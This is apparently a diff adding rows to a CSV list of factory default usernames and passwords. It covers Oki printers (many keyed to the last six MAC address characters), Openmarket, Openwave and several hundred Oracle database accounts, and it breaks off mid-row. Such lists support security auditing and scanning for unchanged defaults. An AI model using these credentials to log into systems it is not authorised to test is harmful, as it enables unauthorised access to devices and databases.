+oce,TDS450,,,oceservice,ser4OCE!,tech/admin,, +oce,cm4010,,Web Console via IP Address,Administrator,admin,administrator level,, +oce,tcs500, Windows XP, all models,12.3.0(1668),console, http://192.168.0.81,, +ods,1094 IS Chassis,,,ods,ods,,4.x, +ods,1094,,,ods,ods,,, +oki,9600,,,admin,last six characters of the MAC address (letters uppercase).,,, +oki,B410dn,,http://169.254.39.211/,admin,Last 6 characters (chars uppercased) from MAC Address,admin,, +oki,B431dn,,http://192.168.1.xxx,root,123456,Admin,, +oki,B6300,,,root,last six charachter of mac address,root,, +oki,B720N,All versions,Web interface,root,aaaaaa,Root access,, +oki,C3450,,http://192.168.1.50,admin,heslo,admin,, +oki,C3450,,web,admin,last 6 digits of MAC code, Use uppercase letters,, +oki,C3530,,console,admin,last 6 digits of MAC address,Admin,, +oki,C5550 MFP,,http,,*blank*,Admin,, +oki,C5650,,Multi,root,Last 6 characters of MAC address (uppercase),Admin,Last 6 digits are also at the end of the default printer name, +oki,C5700,,HTTP,root,the 6 last digit of the MAC adress,Admin,running with other models, +oki,C5850,,http,admin,last 6 characters of the MAC ADRESS,,, +oki,C5900,,HTTP,root,Last 6 characters (chars uppercased) from MAC Address,admin,, +oki,C610,,,admin,aaaaaa,admin,, +oki,C6100,,HTTP,root,Last 6 characters of MAC address (uppercase),Administrative,seems to work with a variety of oki printers., +oki,C710,All versions,http,root,Last 6 characters (chars uppercased) from MAC Address,Full acces to printer configuration,, +oki,C7300,A3.14, may apply to other versions,Multi,root,Last six digits of default device name,, +oki,C7350,,Administrator,root,Last 6 characters (chars uppercased) from MAC Address,,, +oki,C7350,,Multi,root,Last 6 characters (chars uppercased) from MAC Address,Administrator,, +oki,C830,all,web,root,last 6 digits of the MAC address,,, +oki,C8800,,Web or Console,root,Last six characters of MAC address,,, +oki,C9500,,HTTP / telnet,root,Last 6 characters (chars uppercased) from MAC Address,Administration,, +oki,ES5460 MFP,,Local configuration menu,,aaaaaa,Admin/Root i guess,, +oki,ES7411,,web HTTP,admin,aaaaaa,Administrator,, +oki,ES8460,,http,admin,aaaaaa,,, +oki,MC360,,Console,admin,aaaaaa,Full acces to printer configuration,, +oki,MC360,,HTTP,admin,Last 6 characters (chars uppercased) from MAC Address,Administration,, +oki,MC560,,Printer Menu,,,,When asked for password, +oki,MC860,,Web interface,admin,aaaaaa,admin,, +oki,ML491n,,http://,Admin,OkiLAN,Admin,, +oki,b710,all,http://192.168.1.33,root,aaaaaa,Administrator,, +oki,c3450,All,Multi,admin,last 6 characters of the MAC ADRESS,Admin,no, +oki,c5300,,,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters type them as upper case",,, +oki,c5300,,Console,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters,type them as upper case",No, +oki,c5300,,Multi,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters,type them as upper case",No, +oki,c5300,,admin,root,last 6 characters of the MAC ADRESS "if it contains any alpha characters type them as upper case",,, +olicom,8600,,9600,-,AaBbCcDd,,, +olicom,8600,all,Serial,-,AaBbCcDd,9600,, +olitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250, +olitec,sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23, +omnitronix,Data-Link,DL150,Multi,,SMDR,Admin,, +omnitronix,Data-Link,DL150,Multi,,SUPER,Admin,, +omron,MR104FH,,Multi,,,Admin,, +oodie.com,odfaq,,admin,admin,admin,,, +oodiecom,odfaq,2.1.0,HTTP,admin,admin,admin,, +openconnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin,, +openconnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin,, +openmarket,Content Server,,,Bobo,hello,,, +openmarket,Content Server,,,Coco,hello,,, +openmarket,Content Server,,,Flo,hello,,, +openmarket,Content Server,,,Joe,hello,,, +openmarket,Content Server,,,Moe,hello,,, +openmarket,Content Server,,,admin,demo,,, +openmarket,Content Server,,,user_analyst,demo,,, +openmarket,Content Server,,,user_approver,demo,,, +openmarket,Content Server,,,user_author,demo,,, +openmarket,Content Server,,,user_checker,demo,,, +openmarket,Content Server,,,user_designer,demo,,, +openmarket,Content Server,,,user_editor,demo,,, +openmarket,Content Server,,,user_expert,demo,,, +openmarket,Content Server,,,user_marketer,demo,,, +openmarket,Content Server,,,user_pricer,demo,,, +openmarket,Content Server,,,user_publisher,demo,,, +openmarket,Content Server,,http,Admin,demo,Admin,, +openmarket,Content Server,,http,Bobo,hello,,, +openmarket,Content Server,,http,Coco,hello,,, +openmarket,Content Server,,http,Flo,hello,,, +openmarket,Content Server,,http,Joe,hello,,, +openmarket,Content Server,,http,Moe,hello,,, +openmarket,Content Server,,http,user_analyst,demo,,, +openmarket,Content Server,,http,user_approver,demo,,, +openmarket,Content Server,,http,user_author,demo,,, +openmarket,Content Server,,http,user_checker,demo,,, +openmarket,Content Server,,http,user_designer,demo,,, +openmarket,Content Server,,http,user_editor,demo,,, +openmarket,Content Server,,http,user_expert,demo,,, +openmarket,Content Server,,http,user_marketer,demo,,, +openmarket,Content Server,,http,user_pricer,demo,,, +openmarket,Content Server,,http,user_publisher,demo,,, +openwave,MSP,,Admin,cac_admin,cacadmin,,, +openwave,MSP,,Any,cac_admin,cacadmin,,, +openwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin,, +openwave,WAP Gateway,,Admin,sys,uplink,,, +openwave,WAP Gateway,,Any,sys,uplink,,, +openwave,WAP Gateway,Any,HTTP,sys,uplink,Admin,, +openxchange,Open-Xchange LDAP,Open source versions below 0.8.2,,mailadmin,secret,high risk,, +openxchange,Open-Xchange Server,5,,mailadmin,secret,Admin,, +optivision,Nac 3000 & 4000,,,root,mpegvideo,,any, +optivision,Nac 3000,,,root,mpegvideo,,, +optus,Counter-Strike,,1.3,Administrator,admin,,, +optus,Counter-Strike,,Admin,Administrator,admin,,, +optus,Counter-Strike,1.3,Multi,Administrator,admin,Admin,, +oracle corporation,Oracle,,,ABM,ABM,,, +oracle corporation,Oracle,,,ADAMS,WOOD,,, +oracle corporation,Oracle,,,ADLDEMO,ADLDEMO,,, +oracle corporation,Oracle,,,ADMIN,JETSPEED,,, +oracle corporation,Oracle,,,ADMINISTRATOR,ADMIN,,, +oracle corporation,Oracle,,,AHL,AHL,,, +oracle corporation,Oracle,,,AHM,AHM,,, +oracle corporation,Oracle,,,AK,AK,,, +oracle corporation,Oracle,,,ALHRO,XXX,,, +oracle corporation,Oracle,,,ALHRW,XXX,,, +oracle corporation,Oracle,,,ALR,ALR,,, +oracle corporation,Oracle,,,AMS,AMS,,, +oracle corporation,Oracle,,,AMV,AMV,,, +oracle corporation,Oracle,,,ANDY,SWORDFISH,,, +oracle corporation,Oracle,,,ANONYMOUS,ANONYMOUS,,, +oracle corporation,Oracle,,,AP,AP,,, +oracle corporation,Oracle,,,APPLMGR,APPLMGR,,, +oracle corporation,Oracle,,,APPLSYS,FND,,, +oracle corporation,Oracle,,,APPLSYSPUB,FNDPUB,,, +oracle corporation,Oracle,,,APPLYSYSPUB,PUB,,, +oracle corporation,Oracle,,,APPS,APPS,,, +oracle corporation,Oracle,,,APPS_MRC,APPS,,, +oracle corporation,Oracle,,,APPUSER,APPPASSWORD,,, +oracle corporation,Oracle,,,AQ,AQ,,, +oracle corporation,Oracle,,,AQDEMO,AQDEMO,,, +oracle corporation,Oracle,,,AQJAVA,AQJAVA,,, +oracle corporation,Oracle,,,AQUSER,AQUSER,,, +oracle corporation,Oracle,,,AR,AR,,, +oracle corporation,Oracle,,,ASF,ASF,,, +oracle corporation,Oracle,,,ASG,ASG,,, +oracle corporation,Oracle,,,ASL,ASL,,, +oracle corporation,Oracle,,,ASO,ASO,,, +oracle corporation,Oracle,,,ASP,ASP,,, +oracle corporation,Oracle,,,AST,AST,,, +oracle corporation,Oracle,,,ATM,SAMPLEATM,,, +oracle corporation,Oracle,,,AUDIOUSER,AUDIOUSER,,, +oracle corporation,Oracle,,,AURORA$JIS$UTILITY$,INVALID,,, +oracle corporation,Oracle,,,AURORA$ORB$UNAUTHENTICATED,,,, +oracle corporation,Oracle,,,AX,AX,,, +oracle corporation,Oracle,,,AZ,AZ,,, +oracle corporation,Oracle,,,BC4J,BC4J,,, +oracle corporation,Oracle,,,BEN,BEN,,, +oracle corporation,Oracle,,,BIC,BIC,,, +oracle corporation,Oracle,,,BIL,BIL,,, +oracle corporation,Oracle,,,BIM,BIM,,, +oracle corporation,Oracle,,,BIS,BIS,,, +oracle corporation,Oracle,,,BIV,BIV,,, +oracle corporation,Oracle,,,BIX,BIX,,, +oracle corporation,Oracle,,,BLAKE,PAPER,,, +oracle corporation,Oracle,,,BLEWIS,BLEWIS,,, +oracle corporation,Oracle,,,BOM,BOM,,, +oracle corporation,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,, +oracle corporation,Oracle,,,BRUGERNAVN,ADGANGSKODE,,, +oracle corporation,Oracle,,,BRUKERNAVN,PASSWORD,,, +oracle corporation,Oracle,,,BSC,BSC,,, +oracle corporation,Oracle,,,BUG_REPORTS,BUG_REPORTS,,, +oracle corporation,Oracle,,,CALVIN,HOBBES,,, +oracle corporation,Oracle,,,CATALOG,CATALOG,,, +oracle corporation,Oracle,,,CCT,CCT,,, +oracle corporation,Oracle,,,CDEMO82,UNKNOWN,,, +oracle corporation,Oracle,,,CDEMOCOR,CDEMOCOR,,, +oracle corporation,Oracle,,,CDEMORID,CDEMORID,,, +oracle corporation,Oracle,,,CDEMOUCB,CDEMOUCB,,, +oracle corporation,Oracle,,,CDOUGLAS,CDOUGLAS,,, +oracle corporation,Oracle,,,CE,CE,,, +oracle corporation,Oracle,,,CENTRA,CENTRA,,, +oracle corporation,Oracle,,,CENTRAL,CENTRAL,,, +oracle corporation,Oracle,,,CIDS,CIDS,,, +oracle corporation,Oracle,,,CIS,ZWERG,,, +oracle corporation,Oracle,,,CISINFO,ZWERG,,, +oracle corporation,Oracle,,,CLARK,CLOTH,,, +oracle corporation,Oracle,,,CLKANA,,,, +oracle corporation,Oracle,,,CLKRT,,,, +oracle corporation,Oracle,,,CN,CN,,, +oracle corporation,Oracle,,,COMPANY,COMPANY,,, +oracle corporation,Oracle,,,COMPIERE,COMPIERE,,, +oracle corporation,Oracle,,,CQSCHEMAUSER,PASSWORD,,, +oracle corporation,Oracle,,,CQUSERDBUSER,PASSWORD,,, +oracle corporation,Oracle,,,CRP,CRP,,, +oracle corporation,Oracle,,,CS,CS,,, +oracle corporation,Oracle,,,CSC,CSC,,, +oracle corporation,Oracle,,,CSD,CSD,,, +oracle corporation,Oracle,,,CSE,CSE,,, +oracle corporation,Oracle,,,CSF,CSF,,, +oracle corporation,Oracle,,,CSI,CSI,,, +oracle corporation,Oracle,,,CSL,CSL,,, +oracle corporation,Oracle,,,CSMIG,CSMIG,,, +oracle corporation,Oracle,,,CSP,CSP,,, +oracle corporation,Oracle,,,CSR,CSR,,, +oracle corporation,Oracle,,,CSS,CSS,,, +oracle corporation,Oracle,,,CTXDEMO,CTXDEMO,,, +oracle corporation,Oracle,,,CTXSYS,UNKNOWN,,, +oracle corporation,Oracle,,,CUA,CUA,,, +oracle corporation,Oracle,,,CUE,CUE,,, +oracle corporation,Oracle,,,CUF,CUF,,, +oracle corporation,Oracle,,,CUG,CUG,,, +oracle corporation,Oracle,,,CUI,CUI,,, +oracle corporation,Oracle,,,CUN,CUN,,, +oracle corporation,Oracle,,,CUP,CUP,,, +oracle corporation,Oracle,,,CUS,CUS,,, +oracle corporation,Oracle,,,CZ,CZ,,, +oracle corporation,Oracle,,,DATA_SCHEMA,LASKJDF098KSDAF09,,, +oracle corporation,Oracle,,,DBI,MUMBLEFRATZ,,, +oracle corporation,Oracle,,,DBSNMP,DBSNMP,,, +oracle corporation,Oracle,,,DBVISION,DBVISION,,, +oracle corporation,Oracle,,,DCM,,,, +oracle corporation,Oracle,,,DDIC,199220706,,, +oracle corporation,Oracle,,,DEMO,DEMO,,, +oracle corporation,Oracle,,,DEMO8,DEMO8,,, +oracle corporation,Oracle,,,DEMO9,DEMO9,,, +oracle corporation,Oracle,,,DES,DES,,, +oracle corporation,Oracle,,,DES2K,DES2K,,, +oracle corporation,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,, +oracle corporation,Oracle,,,DIANE,PASSWO1,,, +oracle corporation,Oracle,,,DIP,DIP,,, +oracle corporation,Oracle,,,DISCOVERER5,,,, +oracle corporation,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,, +oracle corporation,Oracle,,,DMSYS,DMSYS,,, +oracle corporation,Oracle,,,DPF,DPFPASS,,, +oracle corporation,Oracle,,,DSGATEWAY,,,, +oracle corporation,Oracle,,,DSSYS,DSSYS,,, +oracle corporation,Oracle,,,DTSP,DTSP,,, +oracle corporation,Oracle,,,EAA,EAA,,, +oracle corporation,Oracle,,,EAM,EAM,,, +oracle corporation,Oracle,,,EARLYWATCH,SUPPORT,,, +oracle corporation,Oracle,,,EAST,EAST,,, +oracle corporation,Oracle,,,EC,EC,,, +oracle corporation,Oracle,,,ECX,ECX,,, +oracle corporation,Oracle,,,EJB,EJB,,, +oracle corporation,Oracle,,,EJSADMIN,EJSADMIN,,, +oracle corporation,Oracle,,,EMP,EMP,,, +oracle corporation,Oracle,,,ENG,ENG,,, +oracle corporation,Oracle,,,ENI,ENI,,, +oracle corporation,Oracle,,,ESTOREUSER,ESTORE,,, +oracle corporation,Oracle,,,EVENT,EVENT,,, +oracle corporation,Oracle,,,EVM,EVM,,, +oracle corporation,Oracle,,,EXAMPLE,EXAMPLE,,, +oracle corporation,Oracle,,,EXFSYS,EXFSYS,,, +oracle corporation,Oracle,,,EXTDEMO,EXTDEMO,,, +oracle corporation,Oracle,,,EXTDEMO2,EXTDEMO2,,, +oracle corporation,Oracle,,,FA,FA,,, +oracle corporation,Oracle,,,FEM,FEM,,, +oracle corporation,Oracle,,,FII,FII,,, +oracle corporation,Oracle,,,FINANCE,FINANCE,,, +oracle corporation,Oracle,,,FINPROD,FINPROD,,, +oracle corporation,Oracle,,,FLM,FLM,,, +oracle corporation,Oracle,,,FND,FND,,, +oracle corporation,Oracle,,,FOO,BAR,,, +oracle corporation,Oracle,,,FPT,FPT,,, +oracle corporation,Oracle,,,FRM,FRM,,, +oracle corporation,Oracle,,,FROSTY,SNOWMAN,,, +oracle corporation,Oracle,,,FTE,FTE,,, +oracle corporation,Oracle,,,FV,FV,,, +oracle corporation,Oracle,,,GL,GL,,, +oracle corporation,Oracle,,,GMA,GMA,,, +oracle corporation,Oracle,,,GMD,GMD,,, +oracle corporation,Oracle,,,GME,GME,,, +oracle corporation,Oracle,,,GMF,GMF,,, +oracle corporation,Oracle,,,GMI,GMI,,, +oracle corporation,Oracle,,,GML,GML,,, +oracle corporation,Oracle,,,GMP,GMP,,, +oracle corporation,Oracle,,,GMS,GMS,,, +oracle corporation,Oracle,,,GPFD,GPFD,,, +oracle corporation,Oracle,,,GPLD,GPLD,,, +oracle corporation,Oracle,,,GR,GR,,, +oracle corporation,Oracle,,,HADES,HADES,,, +oracle corporation,Oracle,,,HCPARK,HCPARK,,, +oracle corporation,Oracle,,,HLW,HLW,,, +oracle corporation,Oracle,,,HR,HR,,, +oracle corporation,Oracle,,,HRI,HRI,,, +oracle corporation,Oracle,,,HVST,HVST,,, +oracle corporation,Oracle,,,HXC,HXC,,, +oracle corporation,Oracle,,,HXT,HXT,,, +oracle corporation,Oracle,,,IBA,IBA,,, +oracle corporation,Oracle,,,IBE,IBE,,, +oracle corporation,Oracle,,,IBP,IBP,,, +oracle corporation,Oracle,,,IBU,IBU,,, +oracle corporation,Oracle,,,IBY,IBY,,, +oracle corporation,Oracle,,,ICDBOWN,ICDBOWN,,, +oracle corporation,Oracle,,,ICX,ICX,,, +oracle corporation,Oracle,,,IDEMO_USER,IDEMO_USER,,, +oracle corporation,Oracle,,,IEB,IEB,,, +oracle corporation,Oracle,,,IEC,IEC,,, +oracle corporation,Oracle,,,IEM,IEM,,, +oracle corporation,Oracle,,,IEO,IEO,,, +oracle corporation,Oracle,,,IES,IES,,, +oracle corporation,Oracle,,,IEU,IEU,,, +oracle corporation,Oracle,,,IEX,IEX,,, +oracle corporation,Oracle,,,IFSSYS,IFSSYS,,, +oracle corporation,Oracle,,,IGC,IGC,,, +oracle corporation,Oracle,,,IGF,IGF,,, +oracle corporation,Oracle,,,IGI,IGI,,, +oracle corporation,Oracle,,,IGS,IGS,,, +oracle corporation,Oracle,,,IGW,IGW,,, +oracle corporation,Oracle,,,IMAGEUSER,IMAGEUSER,,, +oracle corporation,Oracle,,,IMC,IMC,,, +oracle corporation,Oracle,,,IMEDIA,IMEDIA,,, +oracle corporation,Oracle,,,IMT,IMT,,, +oracle corporation,Oracle,,,INTERNAL,SYS_STNT,,, +oracle corporation,Oracle,,,INV,INV,,, +oracle corporation,Oracle,,,IPA,IPA,,, +oracle corporation,Oracle,,,IPD,IPD,,, +oracle corporation,Oracle,,,IPLANET,IPLANET,,, +oracle corporation,Oracle,,,ISC,ISC,,, +oracle corporation,Oracle,,,ITG,ITG,,, +oracle corporation,Oracle,,,JA,JA,,, +oracle corporation,Oracle,,,JAKE,PASSWO4,,, +oracle corporation,Oracle,,,JE,JE,,, +oracle corporation,Oracle,,,JG,JG,,, +oracle corporation,Oracle,,,JILL,PASSWO2,,, +oracle corporation,Oracle,,,JL ,JL ,,, +oracle corporation,Oracle,,,JMUSER,JMUSER,,, +oracle corporation,Oracle,,,JOHN,JOHN,,, +oracle corporation,Oracle,,,JONES,STEEL,,, +oracle corporation,Oracle,,,JTF,JTF,,, +oracle corporation,Oracle,,,JTM,JTM,,, +oracle corporation,Oracle,,,JTS,JTS,,, +oracle corporation,Oracle,,,JWARD,AIROPLANE,,, +oracle corporation,Oracle,,,KWALKER,KWALKER,,, +oracle corporation,Oracle,,,L2LDEMO,L2LDEMO,,, +oracle corporation,Oracle,,,LBACSYS,LBACSYS,,, +oracle corporation,Oracle,,,LIBRARIAN,SHELVES,,, +oracle corporation,Oracle,,,MANPROD,MANPROD,,, +oracle corporation,Oracle,,,MARK,PASSWO3,,, +oracle corporation,Oracle,,,MASCARM,MANAGER,,, +oracle corporation,Oracle,,,MASTER,PASSWORD,,, +oracle corporation,Oracle,,,MDDATA,MDDATA,,, +oracle corporation,Oracle,,,MDDEMO,MDDEMO,,, +oracle corporation,Oracle,,,MDDEMO_CLERK,MGR,,, +oracle corporation,Oracle,,,MDDEMO_MGR,MGR,,, +oracle corporation,Oracle,,,MDSYS,MDSYS,,, +oracle corporation,Oracle,,,ME,ME,,, +oracle corporation,Oracle,,,MFG,MFG,,, +oracle corporation,Oracle,,,MGR,MGR,,, +oracle corporation,Oracle,,,MGWUSER,MGWUSER,,, +oracle corporation,Oracle,,,MIGRATE,MIGRATE,,, +oracle corporation,Oracle,,,MILLER,MILLER,,, +oracle corporation,Oracle,,,MMO2,UNKNOWN,,, +oracle corporation,Oracle,,,MODTEST,YES,,, +oracle corporation,Oracle,,,MOREAU,MOREAU,,, +oracle corporation,Oracle,,,MRP,MRP,,, +oracle corporation,Oracle,,,MSC,MSC,,, +oracle corporation,Oracle,,,MSD,MSD,,, +oracle corporation,Oracle,,,MSO,MSO,,, +oracle corporation,Oracle,,,MSR,MSR,,, +oracle corporation,Oracle,,,MTSSYS,MTSSYS,,, +oracle corporation,Oracle,,,MTS_USER,MTS_PASSWORD,,, +oracle corporation,Oracle,,,MWA,MWA,,, +oracle corporation,Oracle,,,MXAGENT,MXAGENT,,, +oracle corporation,Oracle,,,NAMES,NAMES,,, +oracle corporation,Oracle,,,NEOTIX_SYS,NEOTIX_SYS,,, +oracle corporation,Oracle,,,NNEUL,NNEULPASS,,, +oracle corporation,Oracle,,,NOMEUTENTE,PASSWORD,,, +oracle corporation,Oracle,,,NOME_UTILIZADOR,SENHA,,, +oracle corporation,Oracle,,,NOM_UTILISATEUR,MOT_DE_PASSE,,, +oracle corporation,Oracle,,,NUME_UTILIZATOR,PAROL,,, +oracle corporation,Oracle,,,OAIHUB902,,,, +oracle corporation,Oracle,,,OAS_PUBLIC,,,, +oracle corporation,Oracle,,,OCITEST,OCITEST,,, +oracle corporation,Oracle,,,OCM_DB_ADMIN,OCM_DB_ADMIN,,, +oracle corporation,Oracle,,,ODM,ODM,,, +oracle corporation,Oracle,,,ODM_MTR,MTRPW,,, +oracle corporation,Oracle,,,ODS,ODS,,, +oracle corporation,Oracle,,,ODSCOMMON,ODSCOMMON,,, +oracle corporation,Oracle,,,ODS_SERVER,ODS_SERVER,,, +oracle corporation,Oracle,,,OE,OE,,, +oracle corporation,Oracle,,,OEMADM,OEMADM,,, +oracle corporation,Oracle,,,OEMREP,OEMREP,,, +oracle corporation,Oracle,,,OEM_REPOSITORY,,,, +oracle corporation,Oracle,,,OKB,OKB,,, +oracle corporation,Oracle,,,OKC,OKC,,, +oracle corporation,Oracle,,,OKE,OKE,,, +oracle corporation,Oracle,,,OKI,OKI,,, +oracle corporation,Oracle,,,OKO,OKO,,, +oracle corporation,Oracle,,,OKR,OKR,,, +oracle corporation,Oracle,,,OKS,OKS,,, +oracle corporation,Oracle,,,OKX,OKX,,, +oracle corporation,Oracle,,,OLAPDBA,OLAPDBA,,, +oracle corporation,Oracle,,,OLAPSVR,INSTANCE,,, +oracle corporation,Oracle,,,OLAPSYS,MANAGER,,, +oracle corporation,Oracle,,,OMWB_EMULATION,ORACLE,,, +oracle corporation,Oracle,,,ONT,ONT,,, +oracle corporation,Oracle,,,OO,OO,,, +oracle corporation,Oracle,,,OPENSPIRIT,OPENSPIRIT,,, +oracle corporation,Oracle,,,OPI,OPI,,, +oracle corporation,Oracle,,,ORACACHE,,,, +oracle corporation,Oracle,,,ORACLE,ORACLE,,, +oracle corporation,Oracle,,,ORADBA,ORADBAPASS,,, +oracle corporation,Oracle,,,ORANGE,,,, +oracle corporation,Oracle,,,ORAPROBE,ORAPROBE,,, +oracle corporation,Oracle,,,ORAREGSYS,ORAREGSYS,,, +oracle corporation,Oracle,,,ORASSO,ORASSO,,, +oracle corporation,Oracle,,,ORASSO_DS,ORASSO_DS,,, +oracle corporation,Oracle,,,ORASSO_PA,ORASSO_PA,,, +oracle corporation,Oracle,,,ORASSO_PS,ORASSO_PS,,, +oracle corporation,Oracle,,,ORASSO_PUBLIC,ORASSO_PUBLIC,,, +oracle corporation,Oracle,,,ORASTAT,ORASTAT,,, +oracle corporation,Oracle,,,ORCLADMIN,WELCOME,,, +oracle corporation,Oracle,,,ORDCOMMON,ORDCOMMON,,, +oracle corporation,Oracle,,,ORDPLUGINS,ORDPLUGINS,,, +oracle corporation,Oracle,,,ORDSYS,ORDSYS,,, +oracle corporation,Oracle,,,OSE$HTTP$ADMIN,INVALID,,, +oracle corporation,Oracle,,,OSM,OSM,,, +oracle corporation,Oracle,,,OSP22,OSP22,,, +oracle corporation,Oracle,,,OSSAQ_HOST,,,, +oracle corporation,Oracle,,,OSSAQ_PUB,,,, +oracle corporation,Oracle,,,OSSAQ_SUB,,,, +oracle corporation,Oracle,,,OTA,OTA,,, +oracle corporation,Oracle,,,OUTLN,OUTLN,,, +oracle corporation,Oracle,,,OWA,OWA,,, +oracle corporation,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,, +oracle corporation,Oracle,,,OWF_MGR,OWF_MGR,,, +oracle corporation,Oracle,,,OWNER,OWNER,,, +oracle corporation,Oracle,,,OZF,OZF,,, +oracle corporation,Oracle,,,OZP,OZP,,, +oracle corporation,Oracle,,,OZS,OZS,,, +oracle corporation,Oracle,,,PA,PA,,, +oracle corporation,Oracle,,,PANAMA,PANAMA,,, +oracle corporation,Oracle,,,PATROL,PATROL,,, +oracle corporation,Oracle,,,PAUL,PAUL,,, +oracle corporation,Oracle,,,PERFSTAT,PERFSTAT,,, +oracle corporation,Oracle,,,PERSTAT,PERSTAT,,, +oracle corporation,Oracle,,,PJM,PJM,,, +oracle corporation,Oracle,,,PLANNING,PLANNING,,, +oracle corporation,Oracle,,,PLEX,PLEX,,, +oracle corporation,Oracle,,,PLSQL,SUPERSECRET,,, +oracle corporation,Oracle,,,PM,PM,,, +oracle corporation,Oracle,,,PMI,PMI,,, +oracle corporation,Oracle,,,PN,PN,,, +oracle corporation,Oracle,,,PO,PO,,, +oracle corporation,Oracle,,,PO7,PO7,,, +oracle corporation,Oracle,,,PO8,PO8,,, +oracle corporation,Oracle,,,POA,POA,,, +oracle corporation,Oracle,,,POM,POM,,, +oracle corporation,Oracle,,,PORTAL,,,, +oracle corporation,Oracle,,,PORTAL30,PORTAL31,,, +oracle corporation,Oracle,,,PORTAL30_ADMIN,PORTAL30_ADMIN,,, +oracle corporation,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,, +oracle corporation,Oracle,,,PORTAL30_PS,PORTAL30_PS,,, +oracle corporation,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,, +oracle corporation,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,, +oracle corporation,Oracle,,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,,, +oracle corporation,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,, +oracle corporation,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,, +oracle corporation,Oracle,,,PORTAL_APP,,,, +oracle corporation,Oracle,,,PORTAL_DEMO,,,, +oracle corporation,Oracle,,,PORTAL_PUBLIC,,,, +oracle corporation,Oracle,,,PORTAL_SSO_PS,PORTAL_SSO_PS,,, +oracle corporation,Oracle,,,POS,POS,,, +oracle corporation,Oracle,,,POWERCARTUSER,POWERCARTUSER,,, +oracle corporation,Oracle,,,PRIMARY,PRIMARY,,, +oracle corporation,Oracle,,,PSA,PSA,,, +oracle corporation,Oracle,,,PSB,PSB,,, +oracle corporation,Oracle,,,PSP,PSP,,, +oracle corporation,Oracle,,,PUBSUB,PUBSUB,,, +oracle corporation,Oracle,,,PUBSUB1,PUBSUB1,,, +oracle corporation,Oracle,,,PV,PV,,, +oracle corporation,Oracle,,,QA,QA,,, +oracle corporation,Oracle,,,QDBA,QDBA,,, +oracle corporation,Oracle,,,QP,QP,,, +oracle corporation,Oracle,,,QS,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_ADM,UNKNOWN,,, +oracle corporation,Oracle,,,QS_CB,QS_CB,,, +oracle corporation,Oracle,,,QS_CBADM,UNKNOWN,,, +oracle corporation,Oracle,,,QS_CS,UNKNOWN,,, +oracle corporation,Oracle,,,QS_ES,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_OS,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_WS,UNKNOWN,,, +oracle corporation,Oracle,,,RE,RE,,, +oracle corporation,Oracle,,,REPADMIN,REPADMIN,,, +oracle corporation,Oracle,,,REPORTS,REPORTS,,, +oracle corporation,Oracle,,,REPORTS_USER,OEM_TEMP,,, +oracle corporation,Oracle,,,REP_MANAGER,DEMO,,, +oracle corporation,Oracle,,,REP_OWNER,REP_OWNER,,, +oracle corporation,Oracle,,,REP_USER,DEMO,,, +oracle corporation,Oracle,,,RG,RG,,, +oracle corporation,Oracle,,,RHX,RHX,,, +oracle corporation,Oracle,,,RLA,RLA,,, +oracle corporation,Oracle,,,RLM,RLM,,, +oracle corporation,Oracle,,,RMAIL,RMAIL,,, +oracle corporation,Oracle,,,RMAN,RMAN,,, +oracle corporation,Oracle,,,RRS,RRS,,, +oracle corporation,Oracle,,,SAMPLE,SAMPLE,,, +oracle corporation,Oracle,,,SAP,SAPR3,,, +oracle corporation,Oracle,,,SAPR3,SAP,,, +oracle corporation,Oracle,,,SCOTT,TIGGER,,, +oracle corporation,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,, +oracle corporation,Oracle,,,SECDEMO,SECDEMO,,, +oracle corporation,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,, +oracle corporation,Oracle,,,SH,SH,,, +oracle corporation,Oracle,,,SITEMINDER,SITEMINDER,,, +oracle corporation,Oracle,,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,,, +oracle corporation,Oracle,,,SLIDE,SLIDEPW,,, +oracle corporation,Oracle,,,SPIERSON,SPIERSON,,, +oracle corporation,Oracle,,,SSP,SSP,,, +oracle corporation,Oracle,,,STARTER,STARTER,,, +oracle corporation,Oracle,,,STRAT_USER,STRAT_PASSWD,,, +oracle corporation,Oracle,,,SWPRO,SWPRO,,, +oracle corporation,Oracle,,,SWUSER,SWUSER,,, +oracle corporation,Oracle,,,SYMPA,SYMPA,,, +oracle corporation,Oracle,,,SYS,MANAGER,,, +oracle corporation,Oracle,,,SYSADM,SYSADM,,, +oracle corporation,Oracle,,,SYSADMIN,SYSADMIN,,, +oracle corporation,Oracle,,,SYSMAN,OEM_TEMP,,, +oracle corporation,Oracle,,,SYSTEM,ORACLE,,, +oracle corporation,Oracle,,,TAHITI,TAHITI,,, +oracle corporation,Oracle,,,TALBOT,MT6CH5,,, +oracle corporation,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,, +oracle corporation,Oracle,,,TEC,TECTEC,,, +oracle corporation,Oracle,,,TEST,TEST,,, +oracle corporation,Oracle,,,TESTPILOT,TESTPILOT,,, +oracle corporation,Oracle,,,TEST_USER,TEST_USER,,, +oracle corporation,Oracle,,,THINSAMPLE,THINSAMPLEPW,,, +oracle 